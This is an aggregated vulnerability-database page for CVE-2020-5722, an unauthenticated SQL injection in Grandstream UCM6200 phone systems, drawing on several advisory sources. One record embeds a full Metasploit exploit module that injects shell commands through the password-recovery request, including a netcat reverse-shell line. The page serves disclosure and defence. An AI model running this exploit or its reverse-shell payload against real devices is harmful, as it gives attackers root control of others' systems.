          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.tenable.com/security/research/tra-2020-15",
              "refsource": "MISC",
              "tags": [
                "Exploit",
                "Third Party Advisory"
              ],
              "url": "https://www.tenable.com/security/research/tra-2020-15"
            },
            {
              "name": "http://packetstormsecurity.com/files/156876/UCM6202-1.0.18.13-Remote-Command-Injection.html",
              "refsource": "MISC",
              "tags": [
                "Exploit",
                "Third Party Advisory",
                "VDB Entry"
              ],
              "url": "http://packetstormsecurity.com/files/156876/UCM6202-1.0.18.13-Remote-Command-Injection.html"
            },
            {
              "name": "http://packetstormsecurity.com/files/165708/Grandstream-UCM62xx-IP-PBX-sendPasswordEmail-Remote-Code-Execution.html",
              "refsource": "MISC",
              "tags": [
                "Exploit",
                "Third Party Advisory",
                "VDB Entry"
              ],
              "url": "http://packetstormsecurity.com/files/165708/Grandstream-UCM62xx-IP-PBX-sendPasswordEmail-Remote-Code-Execution.html"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "acInsufInfo": false,
          "cvssV2": {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "integrityImpact": "COMPLETE",
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          "exploitabilityScore": 10.0,
          "impactScore": 10.0,
          "obtainAllPrivilege": false,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": false,
          "severity": "HIGH",
          "userInteractionRequired": false
        },
        "baseMetricV3": {
          "cvssV3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      },
      "lastModifiedDate": "2022-02-10T07:31Z",
      "publishedDate": "2020-03-23T20:15Z"
    }
  }
}

GHSA-CGGP-723H-VG48

Vulnerability from github – Published: 2022-05-24 17:12 – Updated: 2025-10-22 00:31

Details

Severity ?

9.8 (Critical)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [],
  "aliases": [
    "CVE-2020-5722"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-89"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2020-03-23T20:15:00Z",
    "severity": "HIGH"
  },
  "details": "The HTTP interface of the Grandstream UCM6200 series is vulnerable to an unauthenticated remote SQL injection via crafted HTTP request. An attacker can use this vulnerability to execute shell commands as root on versions before 1.0.19.20 or inject HTML in password recovery emails in versions before 1.0.20.17.",
  "id": "GHSA-cggp-723h-vg48",
  "modified": "2025-10-22T00:31:51Z",
  "published": "2022-05-24T17:12:13Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-5722"
    },
    {
      "type": "WEB",
      "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-5722"
    },
    {
      "type": "WEB",
      "url": "https://www.tenable.com/security/research/tra-2020-15"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/156876/UCM6202-1.0.18.13-Remote-Command-Injection.html"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/165708/Grandstream-UCM62xx-IP-PBX-sendPasswordEmail-Remote-Code-Execution.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

CNVD-2020-23201

Vulnerability from cnvd - Published: 2020-04-17

Title

Grandstream UCM6200 SQL注入漏洞（CNVD-2020-23201）

Description

Grandstream UCM6200是美国潮流网络（Grandstream）公司的一套用于IP电话通信的企业级交换机。 Grandstream UCM6200 1.0.19.20之前版本和1.0.20.17之前版本中的HTTP接口存在SQL注入漏洞，攻击者可利用该漏洞以root权限执行shell命令或向密码找回邮件中注入HTML。

Severity

高

Patch Name

Grandstream UCM6200 SQL注入漏洞（CNVD-2020-23201）的补丁

Patch Description

Formal description

厂商已发布了漏洞修复程序，请及时关注更新： http://www.grandstream.com.cn/

Reference

https://packetstormsecurity.com/files/156876/UCM6202-1.0.18.13-Remote-Command-Injection.html

Impacted products

Name
['Grandstream UCM6200 <1.0.19.20', 'Grandstream UCM6200 <1.0.20.17']

Show details on source website

JSON

To clipboard

{
  "cves": {
    "cve": {
      "cveNumber": "CVE-2020-5722"
    }
  },
  "description": "Grandstream UCM6200\u662f\u7f8e\u56fd\u6f6e\u6d41\u7f51\u7edc\uff08Grandstream\uff09\u516c\u53f8\u7684\u4e00\u5957\u7528\u4e8eIP\u7535\u8bdd\u901a\u4fe1\u7684\u4f01\u4e1a\u7ea7\u4ea4\u6362\u673a\u3002\n\nGrandstream UCM6200 1.0.19.20\u4e4b\u524d\u7248\u672c\u548c1.0.20.17\u4e4b\u524d\u7248\u672c\u4e2d\u7684HTTP\u63a5\u53e3\u5b58\u5728SQL\u6ce8\u5165\u6f0f\u6d1e\uff0c\u653b\u51fb\u8005\u53ef\u5229\u7528\u8be5\u6f0f\u6d1e\u4ee5root\u6743\u9650\u6267\u884cshell\u547d\u4ee4\u6216\u5411\u5bc6\u7801\u627e\u56de\u90ae\u4ef6\u4e2d\u6ce8\u5165HTML\u3002",
  "formalWay": "\u5382\u5546\u5df2\u53d1\u5e03\u4e86\u6f0f\u6d1e\u4fee\u590d\u7a0b\u5e8f\uff0c\u8bf7\u53ca\u65f6\u5173\u6ce8\u66f4\u65b0\uff1a\r\nhttp://www.grandstream.com.cn/",
  "isEvent": "\u901a\u7528\u8f6f\u786c\u4ef6\u6f0f\u6d1e",
  "number": "CNVD-2020-23201",
  "openTime": "2020-04-17",
  "patchDescription": "Grandstream UCM6200\u662f\u7f8e\u56fd\u6f6e\u6d41\u7f51\u7edc\uff08Grandstream\uff09\u516c\u53f8\u7684\u4e00\u5957\u7528\u4e8eIP\u7535\u8bdd\u901a\u4fe1\u7684\u4f01\u4e1a\u7ea7\u4ea4\u6362\u673a\u3002\r\n\r\nGrandstream UCM6200 1.0.19.20\u4e4b\u524d\u7248\u672c\u548c1.0.20.17\u4e4b\u524d\u7248\u672c\u4e2d\u7684HTTP\u63a5\u53e3\u5b58\u5728SQL\u6ce8\u5165\u6f0f\u6d1e\uff0c\u653b\u51fb\u8005\u53ef\u5229\u7528\u8be5\u6f0f\u6d1e\u4ee5root\u6743\u9650\u6267\u884cshell\u547d\u4ee4\u6216\u5411\u5bc6\u7801\u627e\u56de\u90ae\u4ef6\u4e2d\u6ce8\u5165HTML\u3002\u76ee\u524d\uff0c\u4f9b\u5e94\u5546\u53d1\u5e03\u4e86\u5b89\u5168\u516c\u544a\u53ca\u76f8\u5173\u8865\u4e01\u4fe1\u606f\uff0c\u4fee\u590d\u4e86\u6b64\u6f0f\u6d1e\u3002",
  "patchName": "Grandstream UCM6200 SQL\u6ce8\u5165\u6f0f\u6d1e\uff08CNVD-2020-23201\uff09\u7684\u8865\u4e01",
  "products": {
    "product": [
      "Grandstream UCM6200 \u003c1.0.19.20",
      "Grandstream UCM6200 \u003c1.0.20.17"
    ]
  },
  "referenceLink": "https://packetstormsecurity.com/files/156876/UCM6202-1.0.18.13-Remote-Command-Injection.html",
  "serverity": "\u9ad8",
  "submitTime": "2020-03-24",
  "title": "Grandstream UCM6200 SQL\u6ce8\u5165\u6f0f\u6d1e\uff08CNVD-2020-23201\uff09"
}

FKIE_CVE-2020-5722

Vulnerability from fkie_nvd - Published: 2020-03-23 20:15 - Updated: 2025-10-31 22:11

CISA KEV

Severity ?

9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary

References

URL	Tags
vulnreport@tenable.com	http://packetstormsecurity.com/files/156876/UCM6202-1.0.18.13-Remote-Command-Injection.html	Exploit, Third Party Advisory, VDB Entry
vulnreport@tenable.com	http://packetstormsecurity.com/files/165708/Grandstream-UCM62xx-IP-PBX-sendPasswordEmail-Remote-Code-Execution.html	Exploit, Third Party Advisory, VDB Entry
vulnreport@tenable.com	https://www.tenable.com/security/research/tra-2020-15	Exploit, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	http://packetstormsecurity.com/files/156876/UCM6202-1.0.18.13-Remote-Command-Injection.html	Exploit, Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://packetstormsecurity.com/files/165708/Grandstream-UCM62xx-IP-PBX-sendPasswordEmail-Remote-Code-Execution.html	Exploit, Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	https://www.tenable.com/security/research/tra-2020-15	Exploit, Third Party Advisory
134c704f-9b21-4f2e-91b3-4a467353bcc0	https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-5722	US Government Resource

Impacted products

	Vendor	Product	Version
	grandstream	ucm6200_firmware	*
	grandstream	ucm6200	-

JSON

To clipboard

{
  "cisaActionDue": "2022-07-28",
  "cisaExploitAdd": "2022-01-28",
  "cisaRequiredAction": "Apply updates per vendor instructions.",
  "cisaVulnerabilityName": "Grandstream Networks UCM6200 Series SQL Injection Vulnerability",
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:grandstream:ucm6200_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "98FF035C-153C-497E-B889-6C7D836769EA",
              "versionEndExcluding": "1.0.19.20",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:grandstream:ucm6200:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "F9F3E859-0FC6-44E6-909E-4312CBA03032",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "The HTTP interface of the Grandstream UCM6200 series is vulnerable to an unauthenticated remote SQL injection via crafted HTTP request. An attacker can use this vulnerability to execute shell commands as root on versions before 1.0.19.20 or inject HTML in password recovery emails in versions before 1.0.20.17."
    },
    {
      "lang": "es",
      "value": "La interfaz HTTP de la serie Grandstream UCM6200 es vulnerable a una inyecci\u00f3n SQL remota no autenticada por medio de una petici\u00f3n HTTP dise\u00f1ada. Un atacante puede usar esta vulnerabilidad para ejecutar comandos de shell como root en versiones anteriores a 1.0.19.20 o inyectar HTML en correos electr\u00f3nicos de recuperaci\u00f3n de contrase\u00f1a en versiones anteriores a 1.0.20.17."
    }
  ],
  "id": "CVE-2020-5722",
  "lastModified": "2025-10-31T22:11:59.510",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "COMPLETE",
          "baseScore": 10.0,
          "confidentialityImpact": "COMPLETE",
          "integrityImpact": "COMPLETE",
          "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 10.0,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.8,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.8,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.9,
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary"
      }
    ]
  },
  "published": "2020-03-23T20:15:12.043",
  "references": [
    {
      "source": "vulnreport@tenable.com",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://packetstormsecurity.com/files/156876/UCM6202-1.0.18.13-Remote-Command-Injection.html"
    },
    {
      "source": "vulnreport@tenable.com",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://packetstormsecurity.com/files/165708/Grandstream-UCM62xx-IP-PBX-sendPasswordEmail-Remote-Code-Execution.html"
    },
    {
      "source": "vulnreport@tenable.com",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://www.tenable.com/security/research/tra-2020-15"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://packetstormsecurity.com/files/156876/UCM6202-1.0.18.13-Remote-Command-Injection.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://packetstormsecurity.com/files/165708/Grandstream-UCM62xx-IP-PBX-sendPasswordEmail-Remote-Code-Execution.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://www.tenable.com/security/research/tra-2020-15"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "US Government Resource"
      ],
      "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-5722"
    }
  ],
  "sourceIdentifier": "vulnreport@tenable.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-89"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    },
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-89"
        }
      ],
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "type": "Secondary"
    }
  ]
}

VAR-202003-1435

Vulnerability from variot - Updated: 2024-01-18 22:55

The HTTP interface of the Grandstream UCM6200 series is vulnerable to an unauthenticated remote SQL injection via crafted HTTP request. An attacker can use this vulnerability to execute shell commands as root on versions before 1.0.19.20 or inject HTML in password recovery emails in versions before 1.0.20.17. Grandstream UCM6200 In the series SQL An injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Grandstream UCM6200 is a set of enterprise-level switches used for IP telephone communication by the US company Grandstream.

Grandstream UCM6200 versions prior to 1.0.19.20 and versions before 1.0.20.17 have SQL injection vulnerabilities. ##

This module requires Metasploit: https://metasploit.com/download

Current source: https://github.com/rapid7/metasploit-framework

class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking

prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager

def initialize(info = {}) super( update_info( info, 'Name' => 'Grandstream UCM62xx IP PBX sendPasswordEmail RCE', 'Description' => %q{ This module exploits an unauthenticated SQL injection vulnerability (CVE-2020-5722) and a command injection vulnerability (technically, no assigned CVE but was inadvertently patched at the same time as CVE-2019-10662) affecting the Grandstream UCM62xx IP PBX series of devices.

      Exploitation happens in two stages:

      1. An SQL injection during username lookup while executing the "Forgot Password" function. 
      2. A command injection that occurs after the user provided username is passed to a Python script
      via the shell. Like so:

      /bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \
      password '' `cat <<'TTsf7G0' z' or 1=1--`;`nc 10.0.0.3 4444 -e /bin/sh`;` TTsf7G0 `

      This module affect UCM62xx versions before firmware version 1.0.19.20. 
    },
    'License' => MSF_LICENSE,
    'Author' => [
      'jbaines-r7' # Vulnerability discovery, original exploit, and Metasploit module
    ],
    'References' => [
      [ 'CVE', '2020-5722' ],
      [ 'EDB', '48247']
    ],
    'DisclosureDate' => '2020-03-23',
    'Platform' => ['unix', 'linux'],
    'Arch' => [ARCH_CMD, ARCH_ARMLE],
    'Privileged' => true,
    'Targets' => [
      [
        'Unix Command',
        {
          'Platform' => 'unix',
          'Arch' => ARCH_CMD,
          'Type' => :unix_cmd,
          'Payload' => {
            'DisableNops' => true,
            'BadChars' => '\'&|'
          },
          'DefaultOptions' => {
            'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
          }
        }
      ],
      [
        'Linux Dropper',
        {
          'Platform' => 'linux',
          'Arch' => [ARCH_ARMLE],
          'Type' => :linux_dropper,
          'CmdStagerFlavor' => [ 'wget' ]
        }
      ]
    ],
    'DefaultTarget' => 1,
    'DefaultOptions' => {
      'RPORT' => 8089,
      'SSL' => true
    },
    'Notes' => {
      'Stability' => [CRASH_SAFE],
      'Reliability' => [REPEATABLE_SESSION],
      'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK ]
    }
  )
)
register_options([
  OptString.new('TARGETURI', [true, 'Base path', '/'])
])

end

## # Sends a POST /cgi request with a payload of action=getInfo. The # server should respond with a large json blob like the following, # where "prog_version" is he firmware version: # # {"response"=>{ # "model_name"=>"UCM6202", "description"=>"IPPBX Appliance", # "device_name"=>"", "logo"=>"images/h_logo.png", "logo_url"=>"http://www.grandstream.com/", # "copyright"=>"Copyright \u00A9 Grandstream Networks, Inc. 2014. All Rights Reserved.", # "num_fxo"=>"2", "num_fxs"=>"2", "num_pri"=>"0", "num_eth"=>"2", "allow_nat"=>"1", # "svip_type"=>"4", "net_mode"=>"0", "prog_version"=>"1.0.18.13", "country"=>"US", # "support_openvpn"=>"1", "enable_openvpn"=>"0", "enable_webrtc_openvpn"=>"0", # "support_webrtc_cloud"=>"0"}, "status"=>0} ### def check normalized_uri = normalize_uri(target_uri.path, '/cgi') vprint_status("Requesting version information from #{normalized_uri}") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalized_uri, 'vars_post' => { 'action' => 'getInfo' } })

return CheckCode::Unknown('HTTP status code is not 200') unless res&.code == 200

body_json = res.get_json_document
return CheckCode::Unknown('No JSON in response') unless body_json

prog_version = body_json.dig('response', 'prog_version')
return false if prog_version.nil?

vprint_status("The reported version is: #{prog_version}")

version = Rex::Version.new(prog_version)
if version < Rex::Version.new('1.0.19.20')
  return CheckCode::Appears("This determination is based on the version string: #{prog_version}.")
end

return CheckCode::Safe("This determination is based on the version string: #{prog_version}.")

end

## # Throws a payload at the sendPasswordEmail action. The payload must first survive an SQL injection # and then it will get passed to a python script via sh which allows us to execute a command injection. # It will look something like this: # # /bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \ # password '' cat <<'TTsf7G0' z' or 1=1--;nc 10.0.0.3 4444 -e /bin/sh;TTsf7G0 # # This functionality is related to the"Forgot Password" feature. This function is rate limited by # the server so that an attacker can only invoke it, at most, every 60 seconds. As such, only a few # payloads are appropriate. ### def execute_command(cmd, _opts = {}) rand_num = Rex::Text.rand_text_numeric(1..5) res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/cgi'), 'vars_post' => { 'action' => 'sendPasswordEmail', 'user_name' => "' or #{rand_num}=#{rand_num}--;#{cmd};" } }, 5)

# the netcat reverse shell payload holds the connection open. So we'll treat no response
# as a success. The meterpreter payload does not hold the connection open so this clause digs
# deeper to ensure it succeeded. The server will respond with a non-0 status if the payload
# generates an error (e.g. rate limit error)
if res
  fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res.code == 200

  body_json = res.get_json_document
  fail_with(Failure::UnexpectedReply, 'The target did not respond with a JSON body') unless body_json

  status_json = body_json['status']
  fail_with(Failure::UnexpectedReply, 'The JSON response is missing the status element') unless status_json
  fail_with(Failure::UnexpectedReply, "The server responded with an error status #{status_json}") unless status_json == 0
end

print_good('Exploit successfully executed.')

end

def exploit print_status("Executing #{target.name} for #{datastore['PAYLOAD']}") case target['Type'] when :unix_cmd execute_command(payload.encoded) when :linux_dropper execute_cmdstager end end end

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202003-1435",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "ucm6200",
        "scope": "lt",
        "trust": 1.6,
        "vendor": "grandstream",
        "version": "1.0.19.20"
      },
      {
        "model": "ucm6200",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "grandstream",
        "version": "1.0.19.20"
      },
      {
        "model": "ucm6200",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "grandstream",
        "version": "1.0.20.17"
      },
      {
        "model": "ucm6200",
        "scope": "lt",
        "trust": 0.6,
        "vendor": "grandstream",
        "version": "1.0.20.17"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-23201"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003190"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-5722"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:grandstream:ucm6200_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "1.0.19.20",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:grandstream:ucm6200:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-5722"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Jacob Baines",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1337"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2020-5722",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 10.0,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "JVNDB-2020-003190",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2020-23201",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULMON",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "CVE-2020-5722",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "HIGH",
            "trust": 0.1,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 9.8,
            "baseSeverity": "Critical",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "JVNDB-2020-003190",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2020-5722",
            "trust": 1.0,
            "value": "CRITICAL"
          },
          {
            "author": "NVD",
            "id": "JVNDB-2020-003190",
